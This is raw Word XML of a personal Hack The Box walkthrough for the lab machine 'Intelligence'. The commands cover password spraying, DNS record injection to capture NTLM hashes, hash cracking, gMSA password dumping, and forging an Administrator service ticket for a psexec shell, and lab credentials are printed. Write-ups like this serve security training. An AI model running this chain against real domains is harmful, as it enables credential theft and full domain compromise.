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6FE76" w14:textId="0C82875D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 xml:space="preserve">HTB Machine: </w:t>
      </w:r>
      <w:r w:rsidR="00331B00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Intelligence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D04FF3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336EAB7" w14:textId="531C7167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1. Machine Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD73D3C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Short Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB22895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9B9A771" w14:textId="05376F36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2. Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52595731" w14:textId="4ED22685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Nmap Scan Command:</w:t>
      </w:r>
      <w:r w:rsidR="00331B00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52999D37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62E2A5C3" w14:textId="12689E9D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3. Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="7DFB2150" w:rsidR="00843DCE" w:rsidRDefault="00D956D8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after try with all basic we don’t get anything. then in website we obtain the pdf where in u</w:t>
      </w:r>
      <w:r w:rsidR="004464E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l we notice the date</w:t>
      </w:r>
      <w:r w:rsidR="00CD7648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. So we think change the data we may obtain any</w:t>
      </w:r>
      <w:r w:rsidR="00414FC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1078A726" w14:textId="4473D120" w:rsidR="00CD7648" w:rsidRDefault="00BD5891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now we create the loop for create some dates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C727A7B" w14:textId="77777777" w:rsidR="007E4AE9" w:rsidRDefault="007E4AE9" w:rsidP="007E4AE9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now for notice into the tiffany as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C6F9B" w14:textId="1716BBDF" w:rsidR="007E4AE9" w:rsidRDefault="007E4AE9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smbclient -U Tiffany.Molina //ip/IT = into it get downdetector.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42085CE6" w14:textId="5808E7B9" w:rsidR="007E4AE9" w:rsidRDefault="007E4AE9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now we notice what we can do </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489EF6BF" w14:textId="52315452" w:rsidR="00CD7648" w:rsidRDefault="003527C3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for I in $(seq 330 695); do date –date=”$i day ago” +%Y-%m-%d-upload.pdf; done &gt; files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9BF0A1" w14:textId="5746FE13" w:rsidR="00F0518D" w:rsidRDefault="00F0518D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wget</w:t>
      </w:r>
      <w:r w:rsidR="00E56B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00DD6D30" w:rsidRPr="007A0B04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://main-request</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47C1EA2D" w14:textId="6994DA93" w:rsidR="00DD6D30" w:rsidRDefault="00E537BE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exiftool xxxxxx.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326DAACE" w14:textId="5D152F84" w:rsidR="00163FA2" w:rsidRDefault="00565BB6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now try to create the full url in file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0F1594" w14:textId="03126964" w:rsidR="00565BB6" w:rsidRDefault="00565BB6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for i in $(cat ../file); do echo </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="007A0B04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://ip/documents/$i</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE03868" w14:textId="59EF27A3" w:rsidR="0002547A" w:rsidRDefault="0002547A" w:rsidP="0002547A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for i in $(cat ../file); do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wget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hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="007A0B04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://ip/documents/$i</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4CBDEE" w14:textId="71A383F7" w:rsidR="00CD7648" w:rsidRDefault="00422AE5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ls pdf</w:t>
      </w:r>
      <w:r w:rsidR="00441896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = so we obtain from which date the data is been saved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1195D19E" w14:textId="3E262AE2" w:rsidR="00CD7648" w:rsidRDefault="00566C1C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exiftool *.pdf |grep Creator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3017AF4A" w14:textId="3D66A416" w:rsidR="001624CA" w:rsidRDefault="001624CA" w:rsidP="001624CA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exiftool *.pdf |grep Creator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> |awk ‘{‘print $</w:t>
      </w:r>
      <w:r w:rsidR="00E45725">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}’</w:t>
      </w:r>
      <w:r w:rsidR="00E45725">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; ../users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4CC5BA" w14:textId="2F0EC300" w:rsidR="00D51309" w:rsidRDefault="00D51309" w:rsidP="001624CA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now we use kerbrute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FFD96A" w14:textId="281CE81E" w:rsidR="009F327B" w:rsidRDefault="001A1E43" w:rsidP="009F327B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./kerbrute userenum - -dc ip -d intelligence</w:t>
      </w:r>
      <w:r w:rsidR="00D64F5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.ht</w:t>
      </w:r>
      <w:r w:rsidR="00B36AE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26462F5B" w14:textId="69C1E6FC" w:rsidR="00375CEE" w:rsidRDefault="00375CEE" w:rsidP="009F327B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now we need password so we try to notice with the pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA73D53" w14:textId="0E973969" w:rsidR="00375CEE" w:rsidRDefault="00375CEE" w:rsidP="009F327B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for I in $(ls); do pdftotext $i; done</w:t>
      </w:r>
      <w:r w:rsidR="00BD0D3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = its create pdf to txt we we can notice if any password leaked or not</w:t>
      </w:r>
      <w:r w:rsidR="00273395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458115F2" w14:textId="2DA5BE52" w:rsidR="001624CA" w:rsidRDefault="00273395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cat *.txt |grep -I password</w:t>
      </w:r>
      <w:r w:rsidR="005417E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -B5 -A5</w:t>
      </w:r>
      <w:r w:rsidR="00E4044B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = and we obtain password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EA496" w14:textId="61A737CA" w:rsidR="005417E8" w:rsidRDefault="005417E8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lastRenderedPageBreak/>
        <w:t>here -B5 and -A5 is for before and after 5 lines</w:t>
      </w:r>
      <w:r w:rsidR="00E4044B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5B04774E" w14:textId="500399C5" w:rsidR="00DD2C33" w:rsidRDefault="00DD2C33" w:rsidP="00DD2C33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./kerbrute passwordspray - -dc ip -d intelligence.htb users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> paste_password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71216899" w14:textId="7294FBDA" w:rsidR="009F327B" w:rsidRDefault="00355420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and we obtain Tiffany.Molina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F098345" w14:textId="1440D288" w:rsidR="00355420" w:rsidRDefault="00A61704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crackmapexec smb ip -u Tiffany.Molina -p paste_password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB845AE" w14:textId="0B4A927E" w:rsidR="00A61704" w:rsidRDefault="00A61704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crackmapexec smb ip -u Tiffany.Molina -p paste_password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - -shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173EFDD" w14:textId="0F2B0C67" w:rsidR="00A61704" w:rsidRDefault="00A61704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for winrm its failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B16223" w14:textId="382DE71A" w:rsidR="00381529" w:rsidRDefault="00EB5541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bloodhound.py </w:t>
      </w:r>
      <w:r w:rsidR="00EF5798">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-ns ip</w:t>
      </w:r>
      <w:r w:rsidR="00D953B9"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>-d intelligence.htb -dc ip -u Tiffany.Molina</w:t>
      </w:r>
      <w:r w:rsidR="00DE53A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p paste_password</w:t>
      </w:r>
      <w:r w:rsidR="0050504F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265B6300" w14:textId="00762DF3" w:rsidR="00626FC4" w:rsidRDefault="001A7661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neo4j start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76010AE4" w14:textId="5B03486F" w:rsidR="001A7661" w:rsidRDefault="001D19F8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bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252C870" w14:textId="1576F0BF" w:rsidR="001D19F8" w:rsidRDefault="00C73BED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use for tiffany</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E3B98A" w14:textId="1FC47E28" w:rsidR="00A74D8C" w:rsidRDefault="00A74D8C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download krbrelayx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FF81D3" w14:textId="6D0D1B10" w:rsidR="00DC34A1" w:rsidRDefault="00DC34A1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python3 dnstool.py </w:t>
      </w:r>
      <w:r w:rsidR="003E7A43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-u ‘intelligence\tiffany.molina’ -p ‘paste’</w:t>
      </w:r>
      <w:r w:rsidR="00F619D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r webbhavya.intelligence.htb -a add -t A -d our_ip ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFAC157" w14:textId="5092C525" w:rsidR="005065AB" w:rsidRDefault="005065AB" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005065AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smbclient.py Tiffany.Molina:NewIntelligenceCorpUser9876@10.10.10.248</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513DBABF" w14:textId="0DA6C5D8" w:rsidR="005E1396" w:rsidRDefault="005E1396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nc -lvnp 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBC908B" w14:textId="1D7D48A2" w:rsidR="009F327B" w:rsidRDefault="007E37D7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strings downdetector.ps1</w:t>
      </w:r>
      <w:r w:rsidR="00013459">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and vi it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C2AA2A" w14:textId="22A51ED3" w:rsidR="009F327B" w:rsidRDefault="00CB32B3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now we strat the msfdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F8CA9" w14:textId="0B648C84" w:rsidR="00CB32B3" w:rsidRDefault="00CB32B3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sudo msfdb run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E00984" w14:textId="684CC49E" w:rsidR="000963B3" w:rsidRDefault="000963B3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use auxiliary/server/</w:t>
      </w:r>
      <w:r w:rsidR="007D7166">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>capture/http_ntlm</w:t>
      </w:r>
      <w:r w:rsidR="006055F2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3649C0AE" w14:textId="14482BEE" w:rsidR="006055F2" w:rsidRDefault="006055F2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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690F03C1" w14:textId="2280BB80" w:rsidR="0064484A" w:rsidRDefault="0064484A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set SRVPORT 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E55381" w14:textId="5662333C" w:rsidR="001C1400" w:rsidRDefault="001C1400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set URIPATH /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B223E" w14:textId="02292D79" w:rsidR="001C1400" w:rsidRDefault="001C1400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set SRVHOST 10.10.14.56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6517E322" w14:textId="05414CA8" w:rsidR="001C1400" w:rsidRDefault="00DE2F91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show options = now its perfect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C374E87" w14:textId="08984621" w:rsidR="00AF20D2" w:rsidRDefault="00AF20D2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set JOHNPWFILE intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBAA479" w14:textId="780C8596" w:rsidR="00107728" w:rsidRDefault="00107728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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764EBBDB" w14:textId="3929F175" w:rsidR="00107728" w:rsidRDefault="00107728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now in nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA4B37B" w14:textId="5A07D639" w:rsidR="00107728" w:rsidRDefault="00107728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server ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A9FB14" w14:textId="070F7DBF" w:rsidR="00107728" w:rsidRDefault="00107728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webbhavya.intelligence.htb</w:t>
      </w:r>
      <w:r w:rsidR="00DE07DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = it connect back to us</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA076B" w14:textId="45FF9347" w:rsidR="00DE07DB" w:rsidRDefault="00DE07DB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if the sever connect back to us means it has something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E470A91" w14:textId="47B63D66" w:rsidR="00FB3DE8" w:rsidRDefault="00FB3DE8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lastRenderedPageBreak/>
        <w:t>sudo tcpdump -I turn0 port 80 -n -vvv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F4A79D" w14:textId="33F89A97" w:rsidR="005F4ACA" w:rsidRDefault="005F4ACA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after sometime we obtain something into msfdb and tcpdump.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F2BB5E" w14:textId="2B649633" w:rsidR="005F4ACA" w:rsidRDefault="001403CC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so in msfdb we notice that we obtain NTHASH of Ted.Graves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361B7013" w14:textId="027EB288" w:rsidR="00304690" w:rsidRDefault="00304690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to validate that hash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE92BF3" w14:textId="464058A4" w:rsidR="00304690" w:rsidRDefault="00304690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crackmapexec smb ip -u ted.graves H paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F42DE5" w14:textId="07CAFAA7" w:rsidR="00304690" w:rsidRDefault="00304690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its failed so we use netntlmv2 hash may be at the same location where we start the msdb the file saved with this name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115BAD38" w14:textId="4985BBB2" w:rsidR="00304690" w:rsidRDefault="00304690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john intelligence_netntlmv2 - -wordlist=/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D2A54" w14:textId="6C5161C6" w:rsidR="00AE0F4F" w:rsidRDefault="00AE0F4F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cat that file we obtain password was Mr.Teddy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD63819" w14:textId="3C41741D" w:rsidR="00AE0F4F" w:rsidRDefault="009F275A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crackmapexec smb ip -u ted.graves -p Mr.Teddy</w:t>
      </w:r>
      <w:r w:rsidR="001930D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = but for winrm its not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5BD0AC" w14:textId="5E727710" w:rsidR="000C6A4F" w:rsidRDefault="000C6A4F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now we obtain that with GAMS we can change password in bloodhound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2708FBBA" w14:textId="05B27E35" w:rsidR="000C6A4F" w:rsidRDefault="000C6A4F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search read gmsapassword python github</w:t>
      </w:r>
      <w:r w:rsidR="001930D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and git it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1CEB2E" w14:textId="383A5135" w:rsidR="00E03ED6" w:rsidRDefault="00E03ED6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python3 gMSADumper.py -u ‘ted.graves’ -p Mr.Teddy</w:t>
      </w:r>
      <w:r w:rsidR="001E2153">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d intelligence.htb </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE18AF" w14:textId="760F8F3A" w:rsidR="00CD7648" w:rsidRDefault="000578C7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and we obtain svc_int hash copy it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CA6B42" w14:textId="2C46370D" w:rsidR="000578C7" w:rsidRDefault="000578C7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crackmapexec smb ip -u </w:t>
      </w:r>
      <w:r w:rsidR="007E762A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svc_int$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H paste</w:t>
      </w:r>
      <w:r w:rsidR="00435F37">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = but still for winrm its not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728801D6" w14:textId="00445F51" w:rsidR="00E54010" w:rsidRDefault="00E54010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sudo ntpdate ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D081400" w14:textId="072E6108" w:rsidR="000578C7" w:rsidRDefault="009459D3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now generate silver ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C2D66A" w14:textId="2713B782" w:rsidR="00041263" w:rsidRDefault="00041263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cd /opt/impacket/examples/</w:t>
      </w:r>
      <w:r w:rsidR="002F6D92">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = here we obtain the getST.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387AB026" w14:textId="13578774" w:rsidR="003A46D1" w:rsidRDefault="003A46D1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python3 getST.py -spn </w:t>
      </w:r>
      <w:r w:rsidR="00111FBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/dc.intelligence.htb -impersonate Administrator</w:t>
      </w:r>
      <w:r w:rsidR="00FD13F5"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>intelligence</w:t>
      </w:r>
      <w:r w:rsidR="00FD13F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/svc_int$ -hashes paste:paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14835EDE" w14:textId="49366558" w:rsidR="002A36E7" w:rsidRDefault="00970C2D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here we obtain KRB5CCNAME=Administrator.ccache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B7134" w14:textId="005AC2EC" w:rsidR="002A36E7" w:rsidRDefault="002A36E7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impacket-psexec -k -no-pass dc.intelligence.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8632BC" w14:textId="23EC8846" w:rsidR="006F7EA1" w:rsidRDefault="006F7EA1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KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="007A0B04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>intelligence.htb/Administrator@dc.intelligence.htb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4474D4EE" w14:textId="05C6CD27" w:rsidR="006F7EA1" w:rsidRDefault="006F7EA1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and we obtain the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD6A3C6" w14:textId="77777777" w:rsidR="00FD13F5" w:rsidRDefault="00FD13F5" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
